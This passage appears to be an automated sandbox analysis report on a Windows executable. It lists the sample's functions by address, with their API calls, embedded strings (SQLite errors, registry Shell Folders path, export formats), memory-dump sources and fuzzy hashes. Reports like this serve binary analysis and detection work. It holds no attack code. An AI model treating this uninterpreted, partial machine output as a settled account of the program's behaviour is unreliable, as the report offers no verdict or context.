                                                                                                                  • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                  APIs
                                                                                                                  • strlen.MSVCRT ref: 00408DFA
                                                                                                                    • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                                  • memset.MSVCRT ref: 00408E46
                                                                                                                  • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                                  • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memsetstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2350177629-0
                                                                                                                  • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                                  • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                  • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                                  • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset
                                                                                                                  • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                  • API String ID: 2221118986-1606337402
                                                                                                                  • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                                  • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                  • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                                  • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                  APIs
                                                                                                                  • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                                  • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                                                  • memset.MSVCRT ref: 00408FD4
                                                                                                                  • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                                                  • memset.MSVCRT ref: 00409042
                                                                                                                  • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                                    • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 265355444-0
                                                                                                                  • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                                  • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                  • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                                  • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                    • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                    • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                  • memset.MSVCRT ref: 0040C439
                                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                  • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                  • memset.MSVCRT ref: 0040C4D0
                                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4131475296-0
                                                                                                                  • Opcode ID: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                                                                                                  • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                  • Opcode Fuzzy Hash: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                                                                                                  • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004116FF
                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                    • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                  • API String ID: 2618321458-3614832568
                                                                                                                  • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                                  • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                  • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                                  • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFilefreememset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2507021081-0
                                                                                                                  • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                                  • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                  • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                                  • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                  APIs
                                                                                                                  • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                  • malloc.MSVCRT ref: 00417524
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                  • free.MSVCRT ref: 00417544
                                                                                                                  • free.MSVCRT ref: 00417562
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4131324427-0
                                                                                                                  • Opcode ID: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                                                                                  • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                  • Opcode Fuzzy Hash: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                                                                                  • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                  APIs
                                                                                                                  • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                  • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                  • free.MSVCRT ref: 0041822B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: PathTemp$free
                                                                                                                  • String ID: %s\etilqs_$etilqs_
                                                                                                                  • API String ID: 924794160-1420421710
                                                                                                                  • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                  • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                  • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                  • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040FDD5
                                                                                                                    • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                  • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                  • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                  • API String ID: 1775345501-2769808009
                                                                                                                  • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                                  • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                  • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                                  • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                  APIs
                                                                                                                  • wcscpy.MSVCRT ref: 0041477F
                                                                                                                  • wcscpy.MSVCRT ref: 0041479A
                                                                                                                  • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                  • String ID: General
                                                                                                                  • API String ID: 999786162-26480598
                                                                                                                  • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                                  • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                  • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                                  • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                  • _snwprintf.MSVCRT ref: 0040977D
                                                                                                                  • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastMessage_snwprintf
                                                                                                                  • String ID: Error$Error %d: %s
                                                                                                                  • API String ID: 313946961-1552265934
                                                                                                                  • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                                  • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                  • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                                  • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: foreign key constraint failed$new$oid$old
                                                                                                                  • API String ID: 0-1953309616
                                                                                                                  • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                  • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                  • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                  • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                  • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy
                                                                                                                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                  • API String ID: 3510742995-272990098
                                                                                                                  • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                  • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                  • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                  • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0044A6EB
                                                                                                                  • memset.MSVCRT ref: 0044A6FB
                                                                                                                  • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpymemset
                                                                                                                  • String ID: gj
                                                                                                                  • API String ID: 1297977491-4203073231
                                                                                                                  • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                                  • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                  • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                                  • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                                                                                  • free.MSVCRT ref: 0040E9D3
                                                                                                                    • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@$free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2241099983-0
                                                                                                                  • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                                  • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                  • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                                  • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                  APIs
                                                                                                                  • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                  • malloc.MSVCRT ref: 004174BD
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                  • free.MSVCRT ref: 004174E4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4053608372-0
                                                                                                                  • Opcode ID: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                                                                  • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                  • Opcode Fuzzy Hash: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                                                                  • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                  APIs
                                                                                                                  • GetParent.USER32(?), ref: 0040D453
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Rect$ClientParentPoints
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4247780290-0
                                                                                                                  • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                  • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                  • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                  • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                  • memset.MSVCRT ref: 004450CD
                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                    • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
